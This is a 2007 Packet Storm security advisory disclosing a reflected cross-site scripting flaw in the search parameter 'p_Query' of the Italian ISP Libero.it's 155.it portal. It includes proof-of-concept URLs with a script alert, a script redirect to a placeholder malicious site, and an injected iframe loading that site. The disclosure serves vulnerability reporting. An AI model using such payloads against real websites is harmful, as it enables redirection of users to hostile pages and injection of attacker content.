liberoit-xss.txt

2007-08-08T00:00:00
ID PACKETSTORM:58331
Type packetstorm
Reporter Gianni Amato
Modified 2007-08-08T00:00:00

Description

                                        
                                            `The Italian ISP Libero.it not check the HTTP POST Parameter "p_Query" on  
search query and displays the content of this variable without modification  
within the html form area.  
  
Security problems on Libero's 155.it allows attackers to conduct XSS attacks  
for the following URL:  
  
http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=  
  
it is vulnerable for XSS via a malformed search query.  
  
PoC:  
  
- XSS in search function  
  
http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=  
<script>alert(XSS)<script>  
  
  
- Redirect  
  
http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query= <script>  
location.href="http://www.maliciouswebsite.com";</script>  
  
- Html injection (iframe)  
  
<http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query=>  
http://155.libero.it/pls/portal30/w155.cerca_nel_sito?p_Query= <iframe  
src="http://www.maliciouswebsite.com  
"></iframe>  
  
Previous vulnerabilities:  
  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061957.html  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-March/061939.html  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-April/062055.html  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064680.html  
http://lists.grok.org.uk/pipermail/full-disclosure/2007-July/064681.html  
  
--   
Gianni Amato  
http://www.gianniamato.it/  
`